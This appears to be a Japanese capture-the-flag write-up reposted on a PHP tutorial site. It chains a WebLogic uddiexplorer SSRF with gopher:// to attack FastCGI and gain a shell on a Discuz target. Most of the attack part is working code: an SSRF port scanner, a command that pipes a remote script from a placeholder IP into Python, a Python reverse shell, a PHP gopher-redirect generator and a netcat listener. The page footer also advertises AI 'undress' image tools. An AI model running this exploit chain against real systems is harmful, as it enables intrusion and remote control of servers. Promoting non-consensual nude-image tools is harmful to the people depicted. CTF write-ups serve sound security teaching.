目次
3 つの白い帽子 - 星からあなたを探して - 第 1 号
チャレンジの紹介
チャレンジターゲット
0x01 情報収集
脆弱性の悪用
http://www.tuicool.com/articles/UjaqIbz を入手
Port scan.py
コマンド実行
リバウンドシェルのブラックテクノロジー、bashリバウンドは無効です~~
シェルを生成します。 py
gopher.php
リバウンド シェル
GETFLAG
ホームページ バックエンド開発 PHPチュートリアル 三人の白い帽子 ~星から君を探して~ 第1話

三人の白い帽子 ~星から君を探して~ 第1話

Jun 20, 2016 pm 12:26 PM

3 つの白い帽子 - 星からあなたを探して - 第 1 号

チャレンジの紹介

星からあなたを失った、必要かも知れません、すべて使います私の才能はあなたを取り戻すために 2 つの文を作成しましたが、続けることができませんでした。これは非常に単純な質問であることは認めます。

チャレンジターゲット

http://0761e975dda0c67cb.jie.sangebaimao.com/

0x01 情報収集

アドレスを開いてください、dzフォーラムです。あまり面白くないようですが、まだ最新バージョンです。

せっかく潜入したので、必殺兵器「スキャンディレクトリ」を使ってみたいと思います! (辞書が鍵です)

重要な情報はすぐに取得できました (dz のオリジナルのディレクトリとページを除く)

/info.php/uddiexplorer/
ログイン後にコピー

1 つは phpinfo() 情報、非常に役立ちます。

/opt/discuz/info.php
ログイン後にコピー

もう 1 つは Weblogic に関するものです。

決定的な Baidu 「uddiexplorer の脆弱性」 を確認すると、weblogic uddiexplorerSSRF の脆弱性があることがすぐにわかります。

この浸透の鍵は SSRF にあります! ! !

脆弱性の悪用

SSRF は、3 つのホワイト ハット エンチャント Docker を組み合わせて 127.0.0.1 を作成するだけではありません。

万能の Baidu、キーワード 「SearchPublicRegistries ssrf vulnerability exp」を検索

http://www.tuicool.com/articles/UjaqIbz を入手

スクリプトを入手し、自分で変更して使用してください! ! !

Port scan.py

#!/usr/bin/env python  # -*- coding: utf-8 -*- import reimport requestsdef scan(ip_str):    url = 'http://0761e975dda0c67cb.jie.sangebaimao.com'    ports = ('21','22','23','53','80','1080','1433','1521','3306','3389','4899','8080','7001','8000','9000','9001',)    for port in ports:        exp_url = url+"/uddiexplorer/SearchPublicRegistries.jsp?operator=http://%s:%s&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search"%(ip_str, port)        try:            response = requests.get(exp_url, timeout=15, verify=False)            re_sult1 = re.findall('weblogic.uddi.client.structures.exception.XML_SoapException',response.content)            re_sult2 = re.findall('but could not connect',response.content)            if len(re_sult1)!=0 and len(re_sult2)==0:                print ip_str+':'+port        except Exception, e:            passif __name__ == "__main__":    scan('127.0.0.1')
ログイン後にコピー

ポート 22、80、3306、7001、9000 などが正常に検出されました。

SSRF+GOPHER は常に素晴らしく、最近さらに人気が高まっています。

または Baidu~~

rr Chicory の最新記事「Do Evil Things with gopher://」

0x03 Attack FastCGI

一般的に、FastCGI は 127.0.0.1 ポートにバインドされていますが、Gopher+SSRF を使用すると、FastCGI を完全に攻撃して任意のコマンドを実行できます。

0x06 リファレンス

PHP FastCGI のリモート利用

コマンド実行

fcgi_exp のダウンロード

実行

nc -l -p 9000 >x.txt & go run fcgi_exp.go system 127.0.0.1 9000 /opt/discuz/info.php "curl YOURIP/shell.py|python"php -f gopher.php
ログイン後にコピー

ペイロードをx.txtに保存します

リバウンドシェルのブラックテクノロジー、bashリバウンドは無効です~~

次にペイロードをurlencodeしてssrf.php

シェルを生成します。 py

import socket,subprocess,os  s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)  s.connect(("yourip",9999))  os.dup2(s.fileno(),0)  os.dup2(s.fileno(),1)  os.dup2(s.fileno(),2)  p=subprocess.call(["/bin/bash","-i"]);
ログイン後にコピー

gopher.php

<?php$p = str_replace("+", "%20", urlencode(file_get_contents("x.txt")));file_put_contents("ssrf.php", "<?php header('Location: gopher://127.0.0.1:9000/_".$p."');?>");?>
ログイン後にコピー

エクスプロイト ファイル ssrf.php が正常に生成されました

リバウンド シェル

VPS が実行中

nc -lvv 9999
ログイン後にコピー

SSRF を使用してください

http://0761e975dda0c67cb.jie.sangebaimao.com/uddiexplorer/SearchPublicRegistries.jsp?&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business%20location&btnSubmit=Search&operator=YOURIP/ssrf.php
ログイン後にコピー

リバウンド成功~~~

GETFLAG

自分で見つけてください

このウェブサイトの声明
この記事の内容はネチズンが自主的に寄稿したものであり、著作権は原著者に帰属します。このサイトは、それに相当する法的責任を負いません。盗作または侵害の疑いのあるコンテンツを見つけた場合は、admin@php.cn までご連絡ください。

ホットAIツール

Undresser.AI Undress

Undresser.AI Undress

リアルなヌード写真を作成する AI 搭載アプリ

AI Clothes Remover

AI Clothes Remover

写真から衣服を削除するオンライン AI ツール。

Undress AI Tool

Undress AI Tool

脱衣画像を無料で

Clothoff.io

Clothoff.io

AI衣類リムーバー

Video Face Swap

Video Face Swap

完全無料の AI 顔交換ツールを使用して、あらゆるビデオの顔を簡単に交換できます。

ホットツール

メモ帳++7.3.1

メモ帳++7.3.1

使いやすく無料のコードエディター

SublimeText3 中国語版

SublimeText3 中国語版

中国語版、とても使いやすい

ゼンドスタジオ 13.0.1

ゼンドスタジオ 13.0.1

強力な PHP 統合開発環境

ドリームウィーバー CS6

ドリームウィーバー CS6

ビジュアル Web 開発ツール

SublimeText3 Mac版

SublimeText3 Mac版

神レベルのコード編集ソフト(SublimeText3)

JSON Web Tokens(JWT)とPHP APIでのユースケースを説明してください。 JSON Web Tokens(JWT)とPHP APIでのユースケースを説明してください。 Apr 05, 2025 am 12:04 AM

JWTは、JSONに基づくオープン標準であり、主にアイデンティティ認証と情報交換のために、当事者間で情報を安全に送信するために使用されます。 1。JWTは、ヘッダー、ペイロード、署名の3つの部分で構成されています。 2。JWTの実用的な原則には、JWTの生成、JWTの検証、ペイロードの解析という3つのステップが含まれます。 3. PHPでの認証にJWTを使用する場合、JWTを生成および検証でき、ユーザーの役割と許可情報を高度な使用に含めることができます。 4.一般的なエラーには、署名検証障害、トークンの有効期限、およびペイロードが大きくなります。デバッグスキルには、デバッグツールの使用とロギングが含まれます。 5.パフォーマンスの最適化とベストプラクティスには、適切な署名アルゴリズムの使用、有効期間を合理的に設定することが含まれます。

セッションのハイジャックはどのように機能し、どのようにPHPでそれを軽減できますか? セッションのハイジャックはどのように機能し、どのようにPHPでそれを軽減できますか? Apr 06, 2025 am 12:02 AM

セッションハイジャックは、次の手順で達成できます。1。セッションIDを取得します。2。セッションIDを使用します。3。セッションをアクティブに保ちます。 PHPでのセッションハイジャックを防ぐための方法には次のものが含まれます。1。セッション_regenerate_id()関数を使用して、セッションIDを再生します。2。データベースを介してストアセッションデータを3。

確固たる原則と、それらがPHP開発にどのように適用されるかを説明してください。 確固たる原則と、それらがPHP開発にどのように適用されるかを説明してください。 Apr 03, 2025 am 12:04 AM

PHP開発における固体原理の適用には、次のものが含まれます。1。単一責任原則(SRP):各クラスは1つの機能のみを担当します。 2。オープンおよびクローズ原理(OCP):変更は、変更ではなく拡張によって達成されます。 3。Lischの代替原則(LSP):サブクラスは、プログラムの精度に影響を与えることなく、基本クラスを置き換えることができます。 4。インターフェイス分離原理(ISP):依存関係や未使用の方法を避けるために、細粒インターフェイスを使用します。 5。依存関係の反転原理(DIP):高レベルのモジュールと低レベルのモジュールは抽象化に依存し、依存関係噴射を通じて実装されます。

phpstormでCLIモードをデバッグする方法は? phpstormでCLIモードをデバッグする方法は? Apr 01, 2025 pm 02:57 PM

phpstormでCLIモードをデバッグする方法は? PHPStormで開発するときは、PHPをコマンドラインインターフェイス(CLI)モードでデバッグする必要がある場合があります。

フレームワークセキュリティ機能:脆弱性から保護します。 フレームワークセキュリティ機能:脆弱性から保護します。 Mar 28, 2025 pm 05:11 PM

記事では、入力検証、認証、定期的な更新など、脆弱性から保護するためのフレームワークの重要なセキュリティ機能について説明します。

システムの再起動後にUnixSocketの権限を自動的に設定する方法は? システムの再起動後にUnixSocketの権限を自動的に設定する方法は? Mar 31, 2025 pm 11:54 PM

システムが再起動した後、UnixSocketの権限を自動的に設定する方法。システムが再起動するたびに、UnixSocketの許可を変更するために次のコマンドを実行する必要があります:sudo ...

PHPでの後期静的結合を説明します(静的::)。 PHPでの後期静的結合を説明します(静的::)。 Apr 03, 2025 am 12:04 AM

静的結合(静的::) PHPで後期静的結合(LSB)を実装し、クラスを定義するのではなく、静的コンテキストで呼び出しクラスを参照できるようにします。 1)解析プロセスは実行時に実行されます。2)継承関係のコールクラスを検索します。3)パフォーマンスオーバーヘッドをもたらす可能性があります。

See all articles